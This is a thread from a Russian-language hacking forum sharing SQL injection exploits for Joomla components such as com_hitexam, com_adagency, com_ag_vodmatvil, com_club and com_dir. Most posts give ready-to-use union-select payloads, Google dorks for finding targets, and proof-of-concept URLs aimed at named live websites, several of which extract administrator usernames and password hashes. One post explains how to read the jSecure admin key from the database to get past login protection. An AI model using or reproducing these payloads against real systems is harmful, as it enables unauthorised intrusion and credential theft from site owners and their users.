Старый 16.07.2011, 16:59   #21
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

Цитата:
Сообщение от che Посмотреть сообщение
recfrf взгляни на скл запрос https://rdot.org/forum/showpost.php?p=16165&postcount=14, #__ это вишка жоомлы
да, разобрался, это прям , не знал, а то есть несколько проектов где префикс не достать ни как.
recfrf вне форума   Ответить с цитированием
Старый 18.07.2011, 15:34   #22
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Exclamation Joomla com_yvhotels SQL-inj Vuln

# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web

Code:

Цитата:
function show_info( $task ) {

$id = mosGetParam($_REQUEST, 'id');
switch($task) {

case 'desc':
show_hotel_desc( $id );
break;

case 'facils':
show_hotel_facils( $id );
break;

case 'rooms':
show_hotel_rooms( $id );
break;

case 'address':
show_hotel_address( $id );
break;

}
}

function show_hotel_desc( $id ) {
global $database;

$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");

$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];

HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:

exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11 ,12,database(),version(),15,16,17,18,19,20,21--

VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=d esc&id=null+union+all+select+1,2,3,4,user%28%29,6, 7,8,9,10,11,12,database%28%29,version%28%29,15,16, 17,18,19,20,21--

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.
z0mbyak вне форума   Ответить с цитированием
Старый 26.07.2011, 23:27   #23
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Cool Joomla com_hitexam SQL-Inj

Что?? Моя любимая тема на второй позиции??? Не порядок)

Дата: 26,07,2011 16:00
Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component

Уязвимость: SQL-Inj

Автор: z0mbyak

Тип: удалённая
Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)
Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:

PHP код:
function getLevels($id){
$db = $this->getDBO();
$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";
$db->setQuery($sql);
$results = $db->loadObjectList();
return $results;
}


Эксплоит:
_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger

dork: inurl:"index.php?option=com_hitexam"

Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)
z0mbyak вне форума   Ответить с цитированием
Старый 02.08.2011, 11:29   #24
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Exclamation Joomla com_adagency SQl-Inj

#Продукт: com_adagency
#Тип уязвимости: SQL-Inj
#Автор: z0mbyak

Exploit: /index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--

PoC:
http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--


http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--


Специально для forum.antichat.ru и rdot.org/forum/

P.S. Вывод: The requested URL /вывод&Itemid=2 was not found on this server.
z0mbyak вне форума   Ответить с цитированием
Старый 02.08.2011, 11:51   #25
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Exclamation Joomla com_ag_vodmatvil SQl-Inj

#Продукт: com_ag_vodmatvil
#Тип: SQL-Inj
#Автор: z0mbyak

#exploit: /index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,usertype),3+from+jos_users--&Itemid=20

PoC:

http://tube.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20

http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
P.S. Вот, блин, мне делать нефиг)

Специально для forum.antichat.ru и rdot.org/forum/
z0mbyak вне форума   Ответить с цитированием
Старый 23.01.2012, 18:57   #26
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Joomla "com_club" component SQL Injection
Уязвим параметр clubid, что позволяет провести SQL-injection.
Exploit:
Код:
http://site.ltd/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,  8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,  24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
PoC:
Код:
http://vbl.badmintonliga.be/index.php?option=com_club&task=detail&clubid=-70002+union+select+version(),database(),3,4,5,6,7,  8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,  24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
----
Joomla "com_vid" component SQL Injection
Уязвим параметр id, что позволяет провести SQL-injection.
Exploit:
Код:
http://site.ltd/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
PoC:
Код:
http://sasha-shmel.ru/index.php?option=com_vid&Itemid=60&section=video&id_catigor=1&id=-1+union+select+1,2,version(),database(),5,6,7--+f
(c) Ereee
Ereeee вне форума   Ответить с цитированием
Старый 09.02.2012, 19:42   #27
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Joomla "com_dir" component SQL Injection

Exploit:
Код:
http://localhost/[PATH]/index.php?option=com_dir&task=show&id=-1+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f
PoC:
Код:
http://quicaqui.com/index.php?option=com_dir&task=show&id=-381+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f
Ereeee вне форума   Ответить с цитированием
Старый 26.10.2012, 21:44   #28
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию jsecure

Может кому пригодится, последний раз неоднократно столкнулся с тем что есть пароль(скуль), а в админку не попасть, либо редиректит на главную, либо дает такую синюю табличку 404 посреди странички.
Обычно это говорит о плагине jsecure, при наличии которого войти можно только с контрольным словом, проверить именно его наличие можно по путям plugins/system/jsecure.php,plugins/system/jsecure.xml
как оказалось слово лежит в базе, и имея скуль его можно получить. В базе оно лежит jos_plugins колонка element имя jsecure, сам кей и путь редиректа в колонке params "key=jSecure", по умолчанию кей jSecure.
вход в админку будет administrator/?key, в других популярных аналогичных модулях ключ тоже как правило открытый в базе.

Последний раз редактировалось recfrf; 12.01.2013 в 18:10..
recfrf вне форума   Ответить с цитированием
Старый 03.10.2013, 14:44   #29
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Joomla Media Manager File Upload Vulnerability (<=2.5.14, <=3.1.4)

Нужен доступ к Media Manager (или общедоступен, или нужна роль Editor).
http://www.exploit-db.com/exploits/27610/
SynQ вне форума   Ответить с цитированием
Старый 25.06.2014, 15:16   #30
CyberSurgeon
 
Регистрация: 03.06.2014
Сообщений: 9
Репутация: 0
По умолчанию

http://1337day.com/exploit/description/22233 - Joomla! 3.3.0 SQL Injection / automatic upload shell Exploit (0day)

Как думаете, очередной фейк от 1337гей или стоит самому жумлу поворошить? Подозрительно что там и шел аплоад и скули, как-то очень удобно выходит, типа кручу скулю кручу, и опа - шел аплоад. А ещё и всё в одном скрипте, значит хеши брутить не надо.

UPDATE: Они видос запостили, а там их сплоент какой-то com_smilies ломает. Но нет такого компонента в жумле по дефолту (Или я не там смотрю?). Фейк.

Последний раз редактировалось CyberSurgeon; 03.07.2014 в 17:08..
CyberSurgeon вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot